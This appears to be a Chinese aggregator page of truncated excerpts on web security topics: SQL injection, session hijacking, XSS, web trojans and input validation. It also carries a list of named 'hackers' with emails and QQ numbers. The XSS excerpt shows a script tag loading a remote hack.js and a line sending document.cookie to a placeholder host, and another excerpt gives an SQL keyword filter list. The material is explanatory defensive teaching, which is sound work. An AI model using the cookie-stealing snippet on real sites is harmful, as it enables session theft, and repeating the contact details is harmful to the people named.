网站安全

Web安全篇之SQL注入攻击

萝らか妹 提交于 2020-02-25 03:32:43
在网上找了一篇关于sql注入的解释文章,还有很多技术,走马观花吧 文章来源: http://www.2cto.com/article/201310/250877.html ps:直接copy,格式有点问题~ 大家早上好!今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍, SQL注入篇一共分为三讲: 第一讲:“纸上谈兵:我们需要在本地架设注入环境,构造注入语句,了解注入原理。”; 第二讲:“实战演练:我们要在互联网上随机对网站进行友情检测,活学活用,举一反三”; 第三讲:“扩展内容:挂马,提权,留门。此讲内容颇具危害性,不予演示。仅作概述”。 这个主题涉及的东西还是比较多的,结合我们前期所学。主要是让大家切身体会一下,管中窥豹,起到知己知彼的作用。千里之堤溃于蚁穴,以后进入单位,从事相关 程序开发 ,一定要谨小慎微。 问:大家知道骇客们攻击网站主要有哪些手法? SQL注入,旁注,XSS跨站,COOKIE欺骗,DDOS,0day 漏洞 ,社会工程学 等等等等,只要有数据交互,就会存在被入侵风险!哪怕你把网线拔掉,物理隔绝,我还可以利用传感器捕捉电磁辐射信号转换成模拟图像。你把门锁上,我就爬窗户;你把窗户关上,我就翻院墙;你把院墙加高,我就挖地洞。。。道高一尺魔高一丈,我始终坚信计算机不存在绝对的安全,你攻我防,此消彼长,有时候,魔与道只在一念之间。 下面

web安全杂记

拥有回忆 提交于 2020-02-24 21:07:03
session防御方法 1、每当用户登陆的时候就进行重置sessionID 2、sessionID闲置过久时,进行重置sessionID 3、 大部分防止会话劫持的方法对会话固定攻击同样有效。如设置HttpOnly,关闭透明化Session ID,User-Agent验证,Token校验等。 防御方法: 1、 更改Session名称。PHP中Session的默认名称是PHPSESSID,此变量会保存在Cookie中,如果攻击者不分析站点,就不能猜到Session名称,阻挡部分攻击。 2、 关闭透明化Session ID。透明化Session ID指当浏览器中的Http请求没有使用Cookie来存放Session ID时,Session ID则使用URL来传递。 3、 设置HttpOnly。通过设置Cookie的HttpOnly为true,可以防止客户端脚本访问这个Cookie,从而有效的防止XSS攻击。 4、 关闭所有phpinfo类dump request信息的页面。 5、 使用User-Agent检测请求的一致性。但有专家警告不要依赖于检查User-Agent的一致性。这是因为服务器群集中的HTTP代理服务器会对User-Agent进行编辑,而本群集中的多个代理服务器在编辑该值时可能会不一致。 6、 加入Token校验。同样是用于检测请求的一致性,给攻击者制造一些麻烦

电子商务B2B调研报告

孤人 提交于 2020-02-18 19:55:49
电子商务 ... 1 B2B 的实现模式 ... 1 电子商务中的安全 ... 2 B2B 中的物流 ... 2 B2B 中的供应链 ... 6 B2B 的核心技术 ... 6 电子商务成功运营的关键点 ... 10 电子商务  电子商务 ,顾名思义是指在 Internet 网上进行商务活动。其主要功能包括网上的广告、订货、付款、客户服务和货物递交等销售、售前和售后服务,以及市场调查分析、财务核计及生产安排等多项利用 Internet 开发的商业活动。 电子商务 的一个重要技术特征是利用 Web 的技术来传输和处理商业信息。  电子商务 有广义和狭义之分。狭义的 电子商务 也称作电子交易 (e-commerce) ,主要是指利用 Web 提供的通信手段在网上进行的交易。而广义的 电子商务 包括电子交易在内的利用 Web 进行的全部商业活动,如市场分析、客户联系、物资调配等等,亦称作电子商业 (e-business) 。这些商务活动可以发生于公司内部、公司之间及公司与客户之间。  电子商务 不仅仅是买卖,也不仅仅是软硬件的信息,而是在 Internet 、企业内部网 (Intranet) 和企业外部网 (Extranet) ,将买家与卖家、厂商和合作伙伴紧密结合在了一起,因而消除了时间与空间带来的障碍。 B2B 的实现模式 目前企业采用的 B2B 可以分为以下两种模式: 1.

中国黑客名单

佐手、 提交于 2020-02-12 07:04:13
网名:bobo 真实姓名:*** oicq:28901964 电子信箱:*** 网站:*** 简介:网络安全产品专家,熟悉各种路由器、交换机、防火墙、ids、scaner,对网络安全整 体解决方案的提出有其独特的见解。 网名:小鱼巫师 真实姓名:曾庆荣 年龄:23 oicq:961060 电子信箱:z-q-r@此网址已经被屏蔽 网站:http;//www.rootcn.com/flyfish 简介:黑客新秀,有着丰富的编程经验和实战经验。他能够把黑客技术结合到实际编程中, 熟悉防火墙,喜欢音乐和文学。 网名:bigchen 真实姓名:*** 年龄:27 oicq:515365 电子信箱:cjfcom(AT)sohu.com 网站:http;//www.ujc081.chinaw3.com 简介:“坏蛋俱乐部”站长 网名:snake 真实姓名:赖洪昌 年龄:27 oicq:65528 电子信箱:hsnakes(AT)public.szptt.net.cn 网站:http;//snake.gnuchina.org 简介:编程水平一流,开发了许多优秀的安全软件及黑客软件,例如:snakescan、iis5 _idq、sksockserver等。 网名:独行客 真实姓名:王辉 年龄:** oicq:*** 电子信箱:ddxxkk(AT)21cn.com 网站:http;//www

web前端安全

假装没事ソ 提交于 2020-02-05 16:05:26
1. xss: cross site scripting,跨站脚本攻击。 1.1 定义: 指的是通过存在安全漏洞的web网站注册用户的浏览器内运行非法的非本站点HTML标签或js进行的一种攻击方式。 1.2 影响: 利用虚假输入表单骗取用户个人信息。利用脚本窃取用户cookie值,帮助攻击者发送恶意请求(如伪造文章或者图片)。 1.3 案例: 1.3.1 反射型:url参数直接注入,案例如下: //1. 正常网站发送请求:参数from=Ace 窗口输入:https://xxx.com/api?from=Ace //2. 尝试xss攻击:js修改弹出弹窗alert() 窗口输入:https://xxx.com/api?from=<script>alert('尝试在当前页面修改js攻击是否成功')</script> //3. 如果尝试xss攻击成功,可以弹出弹窗,则可以尝试用xss获取用户cookie:即执行指定攻击的js代码 窗口输入:https://xxx.com/api?from=<script scr='https://xxx.com/hack.js'></script> //4. 在https://xxx.com/hack.js代码中:获取cookie var img=new Image() img.src='https://xx.com/img?c='+document

个人(商业)网站安全维护-网页木马防范

我的未来我决定 提交于 2020-02-05 07:55:14
现在国内有许多个人或者公司都建立了网站,网站已经成为日常生活的一部分,而网络钓鱼、网络诈骗、网络盗号等安全问题层出不穷。对于个人(商业)网站安全来讲,其网页挂马危害最大,如今的挂马者主要追寻商业利益,木马程序多是量身订做的,隐蔽性强,危害性大,加上近两年来,许多黑客站点以及网络安全培训的兴起,作为一名“工具”黑客,不需要太多的专业知识,只需要看看录像,学会使用软件工具即可,在这种情况下对于个人(商业)网站的安全维护已经成为网络安全的一个研究课题,本文就个人(商业)网站的安全维护,尤其是网页木马的防范进行了探讨,由于水平有限,不足之处,请多包涵。 (一)个人(商业)网站安全隐患分析 对于个人(商业)网站来讲,其安全主要受制以下一些因素: ( 1 )租用服务器安全。租用服务器安全主要取决于该 ISP 提供商或者虚拟主机等服务提供商自身安全水平。如果该服务器安全无法得到一定程度上的保证,那么个人及其商业网站就无法得到保证。服务器安全主要是指服务器系统设置,补丁更新,防火墙设置, IIS 安全设置,杀毒软件设置等。 注意:现在有很多个人为了追求商业利益,自己随便整一个服务器然后就开始了虚拟主机等服务,这些服务器的安全性往往很差,因此在找虚拟主机和网站空间时一定要认真选择,考虑综合实力相对较强的,否则服务器老是出问题会影响个人(公司)网络业务的开展。 ( 2 )网站程序安全

网站应用需注意的安全验证问题

本秂侑毒 提交于 2020-02-05 07:52:49
以下为总结网站应用方面需要注意的安全问题: 表单数据验证   在数据被输入程序前必须对数据合法性的检验。非法输入问题是最常见的Web应用程序安全漏洞。 需要做到:对任何输入内容进行检查。接受所有可以接受的内容,拒绝所有不能接受的内容。   所有提交的表单数据,都必须验证两次,即提交前在客户端用Javascript验证,提交后在服务器端用脚本再次验证,保证数据的合法性。尤其是对于必填项,不仅需要同时在客户端和服务端验证是否做了输入,还要验证输入的数据格式是否正确。   需要注意:在客户端上的Javascript验证并不是真正意义上的检查。比如恶意用户很容易在自己的终端上禁用脚本执行,从而防止客户端的内容检查脚本运行,使得他可以输入恶意代码并成功地提交表单。   对于图像上传功能,需要验证上传图像的格式及大小是否合乎要求。 防范SQL语句注入攻击   程序需要对所有从外部接收到的数据进行过滤,防止恶意攻击。主要防范的字符有“'|script|exec|insert|select|delete|update|count|chr|mid|master|truncate|declare”。   使用积极的过滤而不是消极的过滤。 换句话说,就是检查应该输入什么,而不是检查不应该输入什么。只规定哪些内容不应该输入,会留下太多的漏洞。因为有很多内容都不应该被输入。积极的过滤方式应该包括:   •

HTTP与HTTPS区别

最后都变了- 提交于 2020-02-01 06:40:35
HTTP 的缺点 到现在为止,我们已了解到 HTTP 具有相当优秀和方便的一面,然而 HTTP 并非只有好的一面,事物皆具两面性,它也是有不足之处的。HTTP 主要有这些不足,例举如下。 1、通信使用明文( 不加密) , 内容可能会被窃听 2、不验证通信方的身份, 因此有可能遭遇伪装 3、无法证明报文的完整性, 所以有可能已遭篡改 这些问题不仅在 HTTP 上出现,其他未加密的协议中也会存在这类问题。 除此之外,HTTP 本身还有很多缺点。而且,还有像某些特定的 Web 服务器和特定的 Web 浏览器在实际应用中存在的不足(也可以说成是脆弱性或安全漏洞),另外,用 Java 和 PHP 等编程语言开发的 Web 应用也可能存在安全漏洞。 通信使用明文可能会被窃听 由于 HTTP 本身不具备加密的功能,所以也无法做到对通信整体(使用 HTTP 协议通信的请求和响应的 内容 )进行加密。即,HTTP 报文使用明文(指未经过加密的报文)方式发送。 TCP/IP 是可能被窃听的网络 如果要问为什么通信时不加密是一个缺点,这是因为,按 TCP/IP 协议族的工作机制,通信内容在所有的通信线路上都有可能遭到窥视。 所谓互联网,是由能连通到全世界的网络组成的。无论世界哪个角落的服务器在和客户端通信时,在此通信线路上的某些网络设备 、光缆、计算机等都不可能是个人的私有物

常见六大Web安全攻防解析

大兔子大兔子 提交于 2020-01-28 12:49:55
转自:https://www.cnblogs.com/fundebug/p/details-about-6-web-security.html 一、XSS XSS (Cross-Site Scripting),跨站脚本攻击,因为缩写和CSS重叠,所以只能叫XSS。跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击 跨站脚本攻击有可能造成以下影响: 利用虚假输入表单骗取用户个人信息 利用脚本窃取用户的Cookie值,被害者在不知情的情况下,帮助攻击者发送恶意请求 显示伪造的文章或图片 XSS的原理是恶意攻击者往Web页面里插入恶意可执行网页脚本代码,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而可以达到攻击者盗取用户信息或其他侵犯用户安全隐私的目的 XSS的攻击方式千变万化,但还是可以大致细分为几种类型 1.非持久型XSS(反射型XSS) 非持久型XSS漏洞,一般是通过给别人发送 带有恶意脚本代码参数的URL ,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行 举一个例子,比如页面中包含有以下代码: <select> <script> document.write('' + '<option value=1>' + location.href.substring(location

此地址使用了一个通常用于网络浏览以外的端口。出于安全原因,Firefox 取消了该请求

时间秒杀一切 提交于 2020-01-26 02:54:53
FirFox打开80以外的端口,会弹出以下提示: “此地址使用了一个通常用于网络浏览以外的端口。出于安全原因,Firefox 取消了该请求。”。 解决方法如下: 在Firefox地址栏输入about:config,然后在右键新建一个字符串键network.security.ports.banned.override,将需访问网站的端口号添加到,值就是那个端口号即可。 如有多个,就半角逗号隔开,例:81,88,98 在能保证安全的前提下,还简化成这样写0-65535。这样,就可以浏览任意端口的网站了。 来源: https://www.cnblogs.com/Sabre/p/4279934.html